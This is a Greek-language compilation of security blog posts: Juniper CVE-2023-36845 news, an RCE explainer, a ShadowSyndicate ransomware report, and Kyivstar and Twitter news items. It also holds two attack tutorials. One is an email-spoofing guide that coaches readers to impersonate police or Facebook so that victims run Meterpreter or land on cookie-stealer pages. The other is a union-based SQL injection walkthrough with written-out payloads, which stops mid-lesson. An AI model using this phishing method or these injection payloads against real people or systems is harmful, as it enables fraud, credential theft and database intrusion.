Εκτιμάται ότι 12.000 τείχη προστασίας SRX και διακόπτες EX της Juniper είναι ευάλωτα σε ένα σφάλμα απομακρυσμένης εκτέλεσης κώδικα χωρίς αρχείο, το οποίο οι επιτιθέμενοι μπορούν να εκμεταλλευτούν χωρίς έλεγχο ταυτότητας.
Τον Αύγουστο, η Juniper αποκάλυψε πολυάριθμες ευπάθειες “PHP environment variant manipulation” (CVE-2023-36844/CVE-2023-36845) και “Missing Authentication for Critical Function” (CVE-2023-36846/CVE-2023-36847), οι οποίες από μόνες τους είχαν μόνο μια “μεσαία” βαθμολογία σοβαρότητας 5,3.
Ωστόσο, όταν αυτές οι ευπάθειες συνδυάστηκαν μεταξύ τους, έγιναν ένα κρίσιμο σφάλμα απομακρυσμένης εκτέλεσης κώδικα με βαθμολογία 9,8.
Σε μια μεταγενέστερη τεχνική έκθεση, η watchTowr Labs δημοσίευσε ένα PoC που συνδύαζε τις ατέλειες CVE-2023-36845 και CVE-2023-36846, επιτρέποντας στους ερευνητές να εκτελέσουν κώδικα εξ αποστάσεως ανεβάζοντας δύο αρχεία σε μια ευάλωτη συσκευή.
Σήμερα, ο Jacob Baines, ερευνητής ευπαθειών του VulnCheck, κυκλοφόρησε ένα άλλο PoC exploit που χρησιμοποιεί μόνο το CVE-2023-36845, παρακάμπτοντας την ανάγκη μεταφόρτωσης αρχείων, ενώ εξακολουθεί να επιτυγχάνει απομακρυσμένη εκτέλεση κώδικα.
Στο πλαίσιο της έκθεσης του Baines, ο ερευνητής μοιράστηκε έναν δωρεάν σαρωτή στο GitHub για να βοηθήσει στον εντοπισμό ευάλωτων αναπτύξεων, δείχνοντας χιλιάδες ευάλωτες συσκευές εκτεθειμένες στο διαδίκτυο.
Το νέο exploit
Ο Baines λέει ότι αγόρασε ένα παλιό τείχος προστασίας Juniper SRX210 για να δοκιμάσει την εκμετάλλευση, αλλά διαπίστωσε ότι η συσκευή του δεν διέθετε τη λειτουργικότητα do_fileUpload() που απαιτείται για τη μεταφόρτωση αρχείων στη συσκευή.
Αυτό ουσιαστικά έσπασε την αλυσίδα εκμετάλλευσης του watchTowr, αναγκάζοντας τον ερευνητή να δει αν υπήρχε άλλος τρόπος να επιτύχει απομακρυσμένη εκτέλεση κώδικα.
Ο Baines διαπίστωσε ότι θα μπορούσε να παρακάμψει την ανάγκη να φορτώσει δύο αρχεία στους διακομιστές-στόχους χειραγωγώντας τις μεταβλητές περιβάλλοντος.
Ο διακομιστής Appweb του τείχους προστασίας της Juniper επεξεργάζεται τα αιτήματα HTTP του χρήστη μέσω stdin κατά την εκτέλεση ενός σεναρίου CGI.
Εκμεταλλευόμενοι αυτό, οι επιτιθέμενοι μπορούν να ξεγελάσουν το σύστημα ώστε να αναγνωρίσει ένα ψευδο-“αρχείο”, /dev/fd/0, και προσαρμόζοντας τη μεταβλητή περιβάλλοντος PHPRC και την αίτηση HTTP, μπορούν να εμφανίσουν ευαίσθητα δεδομένα.
Στη συνέχεια, το VulnCheck αξιοποίησε τα χαρακτηριστικά ‘auto_prepend_file’ και ‘allow_url_include’ της PHP για να εκτελέσει αυθαίρετο κώδικα PHP μέσω του πρωτοκόλλου data:// χωρίς να φορτώσει κανένα αρχείο.
Τούτου λεχθέντος, η βαθμολογία σοβαρότητας του CVE-2023-36845, η οποία είναι 5,4, θα πρέπει τώρα να επανεκτιμηθεί σε μια πολύ υψηλότερη κρίσιμη βαθμολογία λόγω της ικανότητάς του να επιτύχει απομακρυσμένη εκτέλεση κώδικα χωρίς άλλα ελαττώματα.
Επιπτώσεις και κίνδυνοι
Η ευπάθεια CVE-2023-36845 επηρεάζει τις ακόλουθες εκδόσεις του Junos OS στις σειρές EX Series και SRX Series:
All versions before 20.4R3-S8
21.1 version 21.1R1 and later versions
21.2 versions before 21.2R3-S6
21.3 versions before 21.3R3-S5
21.4 versions before 21.4R3-S5
22.1 versions before 22.1R3-S3
22.2 versions before 22.2R3-S2
22.3 versions before 22.3R2-S2, 22.3R3
22.4 versions before 22.4R2-S1, 22.4R3
Ο προμηθευτής κυκλοφόρησε ενημερώσεις ασφαλείας που αντιμετώπισαν την ευπάθεια στις 17 Αυγούστου 2023. Ωστόσο, η χαμηλή βαθμολογία σοβαρότητας που έλαβε το ελάττωμα δεν σήμανε συναγερμό στους επηρεαζόμενους χρήστες, πολλοί από τους οποίους μπορεί να επέλεξαν να αναβάλουν την εφαρμογή του.
Οι σαρώσεις δικτύου του VulnCheck έδειξαν 14.951 Juniper με εκτεθειμένες στο διαδίκτυο διεπαφές ιστού. Από ένα δείγμα 3.000 συσκευών, ο Baines διαπίστωσε ότι το 79% ήταν ευάλωτο σε αυτό το σφάλμα RCE.
Αν αυτό το ποσοστό εφαρμοστεί σε όλες τις εκτεθειμένες συσκευές, τότε έχουμε 11.800 ευάλωτες συσκευές στο διαδίκτυο.
Τέλος, η έκθεση αναφέρει ότι οι Shadowserver και GreyNoise έχουν δει επιτιθέμενους να εξετάζουν τα τελικά σημεία του Junos OS, οπότε οι χάκερς διερευνούν ήδη την ευκαιρία να αξιοποιήσουν το CVE-2023-36845 σε επιθέσεις.
Ως εκ τούτου, οι διαχειριστές της Juniper πρέπει να εφαρμόσουν αυτές τις ενημερώσεις το συντομότερο δυνατό, καθώς θα μπορούσαν να χρησιμοποιηθούν για να αποκτήσουν αρχική πρόσβαση σε εταιρικά δίκτυα.
Στον συναρπαστικό κόσμο της ψηφιακής εποχής μας, η ασφάλεια των υπολογιστικών συστημάτων αποτελεί καίρια πρόκληση. Μια από τις πιο σοβαρές απειλές που κυνηγούν την ασφάλεια των δικτύων και των συσκευών είναι η επίθεση RCE (Remote Code Execution). Σε αυτό το άρθρο, θα ρίξουμε μια ματιά στη φύση της επίθεσης RCE και τους διάφορους τρόπους με τους οποίους μπορεί να χρησιμοποιηθεί.
Τι Είναι η Επίθεση RCE;
Η επίθεση RCE (Remote Code Execution) αναφέρεται στην ευκαιρία του επιτιθέμενου να εκτελέσει κώδικα σε απομακρυσμένο υπολογιστή ή συσκευή, χωρίς την έγκριση ή την αντίληψη του νόμιμου χρήστη. Αυτό σημαίνει ότι ο επιτιθέμενος αποκτά απόλυτο έλεγχο στον στόχο του, ανοίγοντας την πόρτα για πολλούς επικίνδυνους σκοπούς.
Πού Χρησιμοποιείται η Επίθεση RCE;
Οι επιθέσεις RCE μπορούν να εμφανιστούν σε πολλούς τομείς, επηρεάζοντας τόσο τον ατομικό όσο και τον επιχειρηματικό ψηφιακό χώρο:
Κρατικά και Κυβερνητικά Συστήματα: Κυβερνήσεις και κράτη μπορούν να χρησιμοποιήσουν την RCE για να εισέλθουν σε απομακρυσμένους υπολογιστές ή συστήματα για σκοπούς κατασκοπίας, παρακολούθησης ή κυβερνητικού χειρισμού.
Κλοπή Δεδομένων: Κακόβουλοι εισβολείς μπορούν να αξιοποιήσουν την RCE για να προσπελάσουν ευαίσθητα δεδομένα, όπως προσωπικές πληροφορίες, επιχειρηματικά μυστικά και πιστωτικές πληροφορίες.
Διασπορά Κακόβουλου Λογισμικού: Οι επιθέσεις RCE μπορούν να χρησιμοποιηθούν για τη διάδοση κακόβουλου λογισμικού, όπως ιοί και malware, σε μεγάλη κλίμακα.
Απορρόφηση Υπολογιστικών Πόρων: Οι εισβολείς μπορούν να χρησιμοποιήσουν RCE για να εξαντλήσουν τους πόρους ενός συστήματος, καθιστώντας το ανίκανο να λειτουργήσει ή να ανταποκριθεί.
Επιθέσεις DDoS: Οι επιθέσεις RCE μπορούν να χρησιμοποιηθούν ως μέρος της προετοιμασίας και της διεξαγωγής επιθέσεων DDoS (Distributed Denial of Service). Σε αυτές τις επιθέσεις, οι επιτιθέμενοι χρησιμοποιούν RCE για να ανακτήσουν τον έλεγχο των συσκευών ή των υπολογιστών που στη συνέχεια χρησιμοποιούν για να προβούν σε συντονισμένες επιθέσεις DDoS, κατακλύζοντας στόχους με αιτήσεις και απενεργοποιώντας τους.
Πώς Προστατεύουμε τον Εαυτό μας από την Επίθεση RCE;
Η προστασία από τις επιθέσεις RCE απαιτεί συνεχή προσοχή και προληπτικά μέτρα. Εδώ είναι μερικές βασικές συμβουλές για να προστατευτείτε:
Ενημερώστε το Λογισμικό σας: Ενημερώστε συστηματικά το λογισμικό σας, συμπεριλαμβανομένου του λειτουργικού συστήματος, των εφαρμογών και του αντικακοπτή. Οι ενημερώσεις συνήθως περιλαμβάνουν διορθώσεις ευπαθειών που μπορούν να εκμεταλλευτούν οι επιτιθέμενοι.
Προστασία Κωδικών και Προνομίων: Χρησιμοποιήστε δυνατούς κωδικούς πρόσβασης και περιορίστε τις προνομίες που δίνετε στους λογαριασμούς σας. Εφαρμόστε αρχές αρχής λιγότερων προνομίων (Least Privilege) για να περιορίσετε τον έλεγχο που έχουν οι χρήστες.
Χρήση Φιλτράρισματος και Ανίχνευσης: Εγκαταστήστε λύσεις φιλτραρίσματος και ανίχνευσης εισβολών για να εντοπίζετε και να προλαμβάνετε ανομαλίες στην κίνηση του δικτύου και των συστημάτων.
Εκπαίδευση του Προσωπικού: Εκπαιδεύστε το προσωπικό σας σχετικά με τις απειλές και τις βασικές ασφαλείς πρακτικές, ώστε να αναγνωρίζουν και να αντιδρούν σε πιθανές επιθέσεις.
Εφαρμογή Κρυπτογραφίας: Χρησιμοποιήστε ισχυρές κρυπτογραφικές μεθόδους για την προστασία των επικοινωνιών σας και των δεδομένων σας.
Στενός Έλεγχος των Εισόδων: Εφαρμόστε αυστηρό έλεγχο των εισόδων στο δίκτυο και τους διακομιστές σας, ώστε να αποτρέψετε τις ανεπιθύμητες προσπάθειες εισβολής.
Η προστασία από τις επιθέσεις RCE απαιτεί συνεχή παρακολούθηση, εκπαίδευση και εφαρμογή των προληπτικών μέτρων. Επίσης, αξίζει να λαμβάνετε υπόψη ότι η ασφάλεια είναι ένας διαρκώς εξελισσόμενος τομέας, και οι επιθέσεις RCE μπορεί να γίνουν πιο εξειδικευμένες και εκσυγχρονισμένες με την πάροδο του χρόνου.
Τέλος, η συνεργασία με αξιόπιστους ειδικούς ασφαλείας πληροφοριών (SOC) και η διατήρηση ενός ενεργού σχεδίου αντίδρασης σε περίπτωση επίθεσης είναι ζωτικής σημασίας για την αντιμετώπιση των απειλών της επίθεσης RCE. Με συνεχή επιτήρηση και ενημέρωση, μπορείτε να είστε προετοιμασμένοι και να προστατεύσετε αποτελεσματικά τον ψηφιακό σας χώρο από αυτήν την αόρατη, αλλά θανάσιμη απειλή.
Οι ShadowSyndicate χάκερ συνδέονται με πολλαπλές επιθέσεις ransomware
Οι ερευνητές ασφαλείας εντόπισαν υποδομές που ανήκουν σε έναν απειλητικό παράγοντα που τώρα εντοπίζεται ως ShadowSyndicate, ο οποίος πιθανότατα χρησιμοποίησε επτά διαφορετικές οικογένειες ransomware σε επιθέσεις κατά το περασμένο έτος.
Οι αναλυτές της Group-IB που συνεργάζονται με την Bridewell και τον ανεξάρτητο ερευνητή Michael Koczwara αποδίδουν με διάφορους βαθμούς εμπιστοσύνης τη χρήση από το ShadowSyndicate των ransomware Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus και Play σε πολλαπλές παραβιάσεις που παρατηρήθηκαν από τον Ιούλιο του 2022.
Με βάση τα ευρήματά τους, οι ερευνητές πιστεύουν ότι ο δράστης της απειλής θα μπορούσε να είναι ένας αρχικός διαμεσολαβητής πρόσβασης (IAB), αν και τα στοιχεία δείχνουν ότι το ShadowSyndicate είναι συνεργάτης σε πολλαπλές επιχειρήσεις ransomware.
Οι ερευνητές βασίζουν τα συμπεράσματά τους σε ένα ξεχωριστό δακτυλικό αποτύπωμα SSH που ανακάλυψαν σε 85 διακομιστές IP, οι περισσότεροι από τους οποίους χαρακτηρίζονται ως μηχανές εντολών και ελέγχου Cobalt Strike.
Οι αναλυτές είδαν για πρώτη φορά το fingerprint στις 16 Ιουλίου 2022 και εξακολουθούσε να χρησιμοποιείται τον Αύγουστο του 2023.
ShadowSyndicate arsenal
Η ομάδα ερευνητών βασίστηκε σε διάφορα εργαλεία για την έρευνά της, τα οποία περιλάμβαναν μηχανές εντοπισμού όπως οι Shodan και Censys, μαζί με διάφορες τεχνικές OSINT. Αυτό τους επέτρεψε να ανακαλύψουν ένα εκτεταμένο αποτύπωμα δραστηριότητας του ShadowSyndicate.
Εξετάζοντας τους διακομιστές ShadowSyndicate που εντοπίστηκαν με βάση το αποτύπωμα SSH, οι ερευνητές “έπεσαν πάνω σε οκτώ διαφορετικά υδατογραφήματα [κλειδιά άδειας χρήσης] της Cobalt Strike”.
Οι οκτώ διακομιστές Cobalt Strike επικοινωνούσαν με τα ransomware Cactus, Royal, Quantum, Nokoyawa, Play, Clop και BlackCat/ALPHV που αναπτύχθηκαν σε διάφορα δίκτυα θυμάτων.
Οι ερευνητές ανακάλυψαν επίσης διαμορφώσεις του Cobalt Strike που αναπτύχθηκαν σε δύο διακομιστές, αλλά μόνο ο ένας από αυτούς σε ένα μηχάνημα που διέθετε το αποτύπωμα SSH του ShadowSyndicate.
Σε ορισμένες επιθέσεις, το ShadowSyndicate χρησιμοποίησε το εργαλείο διείσδυσης Sliver, το οποίο θεωρούνταν προηγουμένως ως πιθανός αντικαταστάτης του Cobalt Strike.
Άλλα εργαλεία που παρατηρήθηκαν σε επιθέσεις του ShadowSyndicate περιλαμβάνουν τον φορτωτή κακόβουλου λογισμικού IcedID, τον φορτωτή MaaS Matanbuchus και το ωφέλιμο φορτίο Meterpreter Metasploit.
Ανάλυση server
Οι αναλυτές εξέτασαν την υπόθεση ότι και οι 85 διακομιστές με το ίδιο δακτυλικό αποτύπωμα κλειδιού SSH που συνδέονται με το ShadowSyndicate συνδέονται με έναν ενιαίο πάροχο φιλοξενίας, αλλά βρήκαν 18 διαφορετικούς ιδιοκτήτες, 22 διαφορετικά ονόματα δικτύου και 13 διαφορετικές τοποθεσίες.
Η ανάλυση των παραμέτρων του Cobalt Strike C2, όπως η ημερομηνία ανίχνευσης, τα υδατογραφήματα ή οι ρυθμίσεις του χρόνου αναστολής λειτουργίας, βοήθησε στην παραγωγή αποδεικτικών στοιχείων υψηλής αξιοπιστίας που συνδέουν το ShadowSyndicate με τα ransomware Quantum, Nokoyawa και ALPHV/BlackCat.
Συγκεκριμένα, οι αναλυτές συνέδεσαν τους διακομιστές με μια επίθεση Quantum από τον Σεπτέμβριο του 2022, τρεις επιθέσεις Nokoyawa από το τέταρτο τρίμηνο του 2022 και τον Απρίλιο του 2023 και μια επίθεση ALPHV από τον Φεβρουάριο του 2023.
Η Group-IB και τα προαναφερθέντα συνεργαζόμενα μέρη βρήκαν πρόσθετα στοιχεία που συνδέουν το ShadowSyndicate με λιγότερη εμπιστοσύνη με τις επιχειρήσεις κακόβουλου λογισμικού Ryuk, Conti, Trickbot, Royal, Clop και Play.
Ειδικά για το Clop, η έκθεση της Group-IB αναφέρει ότι τουλάχιστον 12 διευθύνσεις IP που προηγουμένως συνδέονταν με τους διαβόητους χειριστές ransomware μεταφέρθηκαν στο ShadowSyndicate από τον Αύγουστο του 2022 και τώρα χρησιμοποιούνται για το Cobalt Strike.
Παρά τα πολλά ευρήματα που υποδηλώνουν μια πιθανή σύνδεση, μια άμεση σύνδεση υψηλής εμπιστοσύνης μεταξύ του ShadowSyndicate και του Clop παραμένει ασύλληπτη.
Οι εμπειρογνώμονες πληροφοριών της Group-IB καταλήγουν στο συμπέρασμα ότι η ShadowSyndicate είναι πιθανότατα μια θυγατρική εταιρεία που συνεργάζεται με διάφορες επιχειρήσεις ransomware-as-a-service (RaaS). Ωστόσο, απαιτούνται πρόσθετα στοιχεία για να υποστηριχθεί αυτή η θεωρία.
Παρ’ όλα αυτά, το έργο αυτό είναι ζωτικής σημασίας για τον εντοπισμό και την καταπολέμηση του εγκλήματος στον κυβερνοχώρο και, με αυτό το πνεύμα, η εταιρεία κυβερνοκατασκοπείας καλεί εξωτερικούς ερευνητές να συνεργαστούν ανοιχτά μαζί της και να βοηθήσουν στην αποκάλυψη των υπόλοιπων ασαφών τμημάτων.
Για λεπτομέρειες που θα μπορούσαν να βοηθήσουν τους αμυντικούς να εντοπίσουν και να αποδώσουν τη δραστηριότητα του ShadowSyndicate, η Group-IB δημοσίευσε σήμερα μια έκθεση με τεχνικά δεδομένα από την έρευνά της.
Στις μέρες μας πολλοί άνθρωποι συνήθισαν πλέον να έχουν ένα προσωπικό τους Email για να μιλάνε με δικά τ ους πρόσωπα ακόμα και για να έχουν κάποια μέσα κοινωνικά δικτύωσης σκεφτήκατε ποτέ όμως ότι αυτό μπορεί να γίνει και ένα ολοζώντανο σενάριο Ηλεκτρονικής παραβίασης; Όχι φυσικά. Οπότε ας πάμε να το αναλύσουμε όσο ποιο πολύ μπορούμε.
Τι είναι ένα Email Spoofing? Ορισμός : Email spoofing είναι η δημιουργία των μηνυμάτων ηλεκτρονικού ταχυδρομείου με πλαστή διεύθυνση αποστολέα.
Ουσιαστικά οι spammers ηλεκτρονικού ταχυδρομείου που χρησιμοποιούν Email Spoofing για να ξεγελάσουν τα θύματά τους ώστε να πιστέψουν ότι ο αποστολέας είναι κάποιος, ο οποίος δεν είναι στην ουσία . Ένα παράδειγμα θα ήταν αν κάποιος στείλει ένα μια επίσημη φόρμα στο θύμα τους, ισχυρίζοντας ότι είναι από το Facebook, με σκοπό την κλοπή και παραπλάνηση του ατόμου.
Πόσα άτομα πέφτουν στην απάτη αυτή καθημερινά?
Μπορώ να σας πω ότι μέσα από την πείρα χρόνων που έχω τα άτομα τα οποία έχουν πέσει θύμα σε αυτές τις επιθέσεις ξεπερνάνε τις χιλιάδες σε παγκόσμια εμβέλεια καθημερινός.
Για ποιους λόγους χρησιμοποιείτε το Email Spoofing?
1. Για να τους κάνετε να τρέξουν κάποιο κακόβουλο λογισμικό δικό σας ( Στην περίπτωση μου έκανα τα θύματα να τρέχουν Meterpreters ) 2. Να κάνουν επίσκεψη σε μία σελίδα που θέλετε εσείς ( Λογικά για τα Views Per Click η για να προσαρμόσετε κάποιο Cookie Stealer / Session Hijack ) 3. Να πληροφορήσετε το θύμα σας με εσφαλμένες πληροφορίες ( Π.Χ ότι κάποιος γνωστός τους απεβίωσε για δικούς σας λόγους πάντα ) 4. Ηλεκτρονικό Ψάρεμα / Υποκλοπές
Το Email spoofing είναι ένας ισχυρός σύμμαχος, αν χρησιμοποιηθεί σωστά μπορείτε να χειραγωγήσετε όποιον θέλετε.
Αυτά είναι τα 4 βασικά στοιχεία που αποτελούν την δομή του Email Spoofing.
Ας ξεκινήσουμε λοιπόν στην σύνθεση του.
Η γλώσσα PhP είναι μια πολύ δυνατή γλώσσα μέσω αυτής μπορούμε να δημιουργήσουμε έναν απλό τύπου Email Spoofing σε php και να το ανεβάσουμε σε κάποια σελίδα δικιά μας,το θέμα μας εδώ είναι ότι κάθε πράγμα που θα αποστείλουμε μέσω του Script θα πάει κατευθείαν στο Spam Folder λόγο του ότι το gmail έχει παραμέτρους για τέτοια Script και τα φιλτράρει οπότε θα βρούμε μια μέθοδο προσπέλασης ας αρχίσουμε λοιπόν.
Θα πρέπει να κάνουμε έναν λογαριασμό αρχικά στο ManDrill από εδώ
https://mailchimp.com/
Προτού πάω παρακάτω θα πω τι είναι το ManDrill.Tο ManDrill είναι ένα Web Based Email Spooder που μας επιτρέπει να αποστείλουμε Email χωρίς το φίλτρο να καταλάβει ότι είναι κακόβουλο το Script με αποτέλεσμα να πάει κατευθείαν στο inbox του προορισμό που ορίσαμε. Ας συνεχίσουμε λοιπόν.
Μόλις κάνετε τον λογαριασμό θα πάτε στην μπάρα πάνω στην αριστερή πλευρά σας και θα επιλέξετε την επιλογή “OutBound” και θα πατήσετε “Compose Message” για όσους δεν κατάλαβαν που πρέπει να πάτε παραθέτω και μία εικόνα
Αμέσως μετά θα σας λέει να συμπληρώσετε στοιχεία αποστολέα και email ακόμα και το μήνυμα θα σας εξηγήσω τι βάζετε ακριβώς. – Από Email / From Email : Η διεύθυνση ηλεκτρονικού ταχυδρομείου που θέλετε να εμφανίζεται από όπου προήλθε το email π.χ μπορείτε να βάλετε από της αστυνομίας η από όποιον οργανισμό θέλετε. – Για Email / Τo Email : η διεύθυνση ηλεκτρονικού ταχυδρομείου που θέλετε το μήνυμα σύνθεσής σας που πρόκειται να παραδοθεί π.χ στον φίλο σας. – Θέμα / Subject : Εδώ βάζετε καθαρά το Θέμα που θα έχει το μήνυμα π.χ ” Facebook Support ” – Και το μεγάλο λευκό κείμενο : Είναι για να κάνετε σύνταξη του μηνύματος που θέλετε να στείλετε στο θύμα σας.
Παραθέτω μια εικόνα για το πως είναι.
Το ποιο σημαντικό κομμάτι είναι να κάνετε το Email σας να είναι πραγματικό οπότε μην ξεχάσετε να εφαρμόσετε και μερικά HTML Elements τι εννοώ με αυτό; Μπορείτε να πλαστογραφήσετε ένα ολόκληρο μήνυμα που σας στείλανε και να το βάλετε στην φόρμα σας κανονικό περιεχόμενο με αλλαγμένους τους σύνδεσμους.
Παραθέτω μια εικόνα.
Μόλις τα έχετε όλα έτοιμα πατήστε ” Send / Αποστολή ”
Το μήνυμα θα έρθει στο θύμα μας μέσα σε μερικά λεπτά και θα είναι στο Inbox του.
Παραθέτω εικόνα του τελικού προϊόντος.
Τελευταίο και καλύτερο από όλα το ManDrill έχει την δυνατότητα να ξέρει πότε ο χρήστης έκανε κλίκ στο Email που το στείλαμε! Οπότε θα είστε ενημερωμένη πάντα αν το έλαβε και αν το διάβασε και δεν έπεσε θύμα.
Η Kyivstar Ανακτά τις Υπηρεσίες μετά από Κυβερνοεπίθεση: Οι Συνέπειες και Η Αποκατάσταση
Το μεγαλύτερο κινητό πάροχο υπηρεσιών τηλεφωνίας της Ουκρανίας, η Kyivstar, ανακοίνωσε την Τετάρτη ότι έχει αποκαταστήσει όλες τις υπηρεσίες της εντός και εκτός της χώρας, μια εβδομάδα μετά από μια μαζική κυβερνοεπίθεση που προκάλεσε ζημιές στην υποδομή των πληροφορικών και επηρέασε τα συστήματα συναγερμού αεροπορικών επιδρομών σε μερικά μέρη της χώρας.
Οι υπηρεσίες της εταιρείας, η οποία έχει περισσότερους από το μισό πληθυσμό της Ουκρανίας ως συνδρομητές κινητής τηλεφωνίας, είχαν απενεργοποιηθεί όταν οι χάκερ χρησιμοποίησαν τον λογαριασμό ενός υπαλλήλου για να πραγματοποιήσουν την επίθεση.
“Έχουμε αποκαταστήσει όλες τις υπηρεσίες 100% σε όλη την Ουκρανία, καθώς και στο εξωτερικό… Όλες οι υπηρεσίες της Kyivstar λειτουργούν χωρίς περιορισμούς,” δήλωσε ο διευθύνων σύμβουλος Oleksandr Komarov σε τηλεοπτικά σχόλια.
Μια ομάδα με το όνομα Solntsepyok, που πιστεύεται από την υπηρεσία ασφαλείας SBU της Ουκρανίας ότι συνδέεται με τη ρωσική στρατιωτική πληροφορία, ανέλαβε την ευθύνη για την επίθεση, ευχαριστώντας τους “ανήσυχους συναδέλφους” στη Kyivstar.
Η SBU έχει ανοίξει ποινική υπόθεση.
Ο Komarov είπε ότι η Kyivstar, η οποία ανήκει στην Veon (VON.AS), μια κινητή τηλεπικοινωνιακή εταιρεία με καταγραφείσα έδρα στο Άμστερνταμ, συνεργάζεται με την SBU στην εξέλιξη της έρευνας.
“Έχουμε βγάλει συμπεράσματα, και αρκετά θεμελιώδη. Πιστεύω ότι θα ισχύσουν όχι μόνο για την Kyivstar, αλλά και για πολλές εταιρείες,” πρόσθεσε.
Η κινητή internet, η φωνή και οι υπηρεσίες SMS αποκαταστάθηκαν πρώτες, αν και υπήρχαν ακόμα κάποιες τεχνικές δυσκολίες, συμπεριλαμβανομένης της Τετάρτης, όταν η φωνητική επικοινωνία επηρεάστηκε σε αρκετές περιοχές.
Οι υπηρεσίες λειτουργούν τώρα κανονικά, δήλωσε η εταιρεία σε ξεχωριστή ανακοίνωση στην πλατφόρμα κοινωνικής δικτύωσης X.
Δεν ήταν σαφές πώς οι χάκερ απέκτησαν πρόσβαση στον λογαριασμό του υπαλλήλου, δήλωσε προηγουμένως η Kyivstar, αλλά τα προσωπικά δεδομένα δεν παραβιάστηκαν.
Πρώην Στέλεχος της Twitter Υποβάλλει Μήνυση εναντίον της X Corp μετά την Εξαγορά από τον Elon Musk
Ένας πρώην στέλεχος της Twitter Inc, που τώρα ονομάζεται X Corp, έχει υποβάλει μήνυση ισχυριζόμενος ότι απολύθηκε μετά την εξαγορά της εταιρείας από τον Elon Musk, επειδή αντιτάχθηκε σε περικοπές προϋπολογισμού που θα εμπόδιζαν την εταιρεία να συμμορφωθεί με μια συμφωνία της με την κυβέρνηση των Ηνωμένων Πολιτειών σχετικά με τις πρακτικές ασφαλείας της.
Ο Alan Rosa, που ήταν παγκοσμίως υπεύθυνος πληροφορικής ασφαλείας της Twitter, υπέβαλε την μήνυση την περασμένη Τρίτη σε ομοσπονδιακό δικαστήριο του Νιου Τζέρσεϊ κατηγορώντας για παραβίαση σύμβασης, παράνομη απόλυση και αντίποινα, μεταξύ άλλων κατηγοριών.
Η X Corp δεν ανταποκρίθηκε άμεσα σε αίτημα για σχόλιο.
Ο Rosa υποστηρίζει ότι προηγουμένως το περασμένο έτος, μετά την εξαγορά από τον Musk, του είπαν να περικόψει τον προϋπολογισμό του τμήματός του για τη φυσική ασφάλεια κατά 50% και να κλείσει λογισμικό που επέτρεπε στην Twitter να μοιράζεται πληροφορίες με αρχές επιβολής του νόμου σε όλο τον κόσμο.
Ο Rosa υποστηρίζει ότι διαφώνησε επειδή οι περικοπές θα έθεταν την Twitter σε κίνδυνο παραβίασης μιας συμφωνίας 150 εκατομμυρίων δολαρίων που είχε συνάψει το 2022 με την Ομοσπονδιακή Επιτροπή Εμπορίου (FTC) των ΗΠΑ, η οποία κατηγορούσε την Twitter για κατάχρηση προσωπικών δεδομένων χρηστών. Η συμφωνία απαιτούσε από την Twitter να υλοποιήσει ελέγχους απορρήτου και πληροφορικής ασφαλείας για την προστασία εμπιστευτικών δεδομένων.
Σύμφωνα με τη μήνυση, απολύθηκε λίγες ημέρες μετά την έκφραση αυτών των ανησυχιών. Ο Rosa ζητά αποζημίωση που δεν καθορίζεται, καθώς και τιμωρητικές ζημίες και δικαστικά έξοδα.
Η X Corp έχει κατηγορηθεί με πολλές μηνύσεις από πρώην υπαλλήλους και στελέχη από τότε που ο Musk απέκτησε την εταιρεία και μείωσε κατά περισσότερο από το ήμισυ το προσωπικό της ως μέτρο εξοικονόμησης.
Αυτές οι μηνύσεις περιλαμβάνουν ένα εύρος κατηγοριών, όπως η μη καταβολή εκατοντάδων εκατομμυρίων δολαρίων ως αποζημίωση σε πρώην υπαλλήλους, η διάκριση κατά των ηλικιωμένων υπαλλήλων, των γυναικών και των εργαζομένων με αναπηρίες, καθώς και η έλλειψη προειδοποίησης για μαζικές απολύσεις. Η X Corp έχει αρνηθεί τις κατηγορίες.
Το Union Based Injection δεν είναι κάτι δύσκολο σε σχέση με Blind SQL Injection , Time-based Blind SQLi etc.
Αρχικά να πούμε με δύο λόγια τι είναι το SQL Injection.
Η επίθεση SQL Injection(SQLi) μας επιτρέπει να κάνουμε “injection” SQL Queries μέσω του URL και να πάρουμε πρόσβαση σε πληροφορίες όπως : usernames , passwords , τηλέφωνα , credit card details , ονόματα , επίθετα etc. Τώρα το Vulnerable URL μας είναι το παρακάτω :
http://192.168.1.26/cat.php?id=1
Τώρα θα έρθει κι θα πει κάποιος πως ξέρουμε ότι αυτό είναι vulnerable σε SQLi ? Μετά το cat.php?id=1 μπορούμε να προσθέσουμε τα παρακάτω :
http://192.168.1.26/cat.php?id=1' http://192.168.1.26/cat.php?id=1" http://192.168.1.26/cat.php?id=1' or '1'='1 http://192.168.1.26/cat.php?id=1' and '1'='1 Τώρα άμα πήραμε ας απάντηση κάποιο από τα παρακάτω μηνύματα σημαίνει ότι είναι vulnerable σε SQLi :
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1
Oracle Error : ORA-00933: SQL command not properly ended
PostgreSQL Error : PSQLException: ERROR: unterminated quoted string at or near “‘” Position: 1 or Query failed: ERROR: syntax error at or near “‘” at character 12 in /www/site/site.php on line 560.
Κάτι ακόμα που θα χρειαστούμε είναι τα διάφορα comments για το SQLi :
Linux : —
Windows : –+
Hash : #
SQL Comment : –+-
Null Byte : ;%00
Αφού είπαμε κάποια βασικά πράγματα ας ξεκινήσουμε το πρώτο πράγματα που πρέπει να κάνουμε είναι να βρούμε τον αριθμώ των columns κάτω από το query. Θα χρησιμοποιήσουμε το order by [number] :
http://192.168.1.26/cat.php?id=1 order by 1-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 2-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 3-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 4-- | Χωρίς Error http://192.168.1.26/cat.php?id=1 order by 5-- | Error
Όταν τρέξαμε το order by 5– πήραμε error “Unknown column ‘5’ in ‘order clause'” οπότε ο αριθμός τον column είναι 4 επειδή πήραμε error στο 5. Τώρα θα δείξουμε μερικά functions που θα μας βοηθήσουμε να πάρουμε πληροφορίες για τον στόχο μας.
@@hostname -> θα μας δώσει το hostname. @@version -> θας μας δώσει την version του DB. database() -> θα μας δώσει την συγκεκριμένη DB. schema() -> θα μας δώσει την συγκεκριμένη DB. user() -> θα μας δώσει τον χρήστη.
Υπάρχουν κι άλλα μπορείτε να ψάξετε στο google. Πάμε τώρα να χρησιμοποιήσουμε το UNION function και να πάρουμε δοκιμάσουμε μερικά functions εφόσον ο αριθμός των columns είναι 4 :
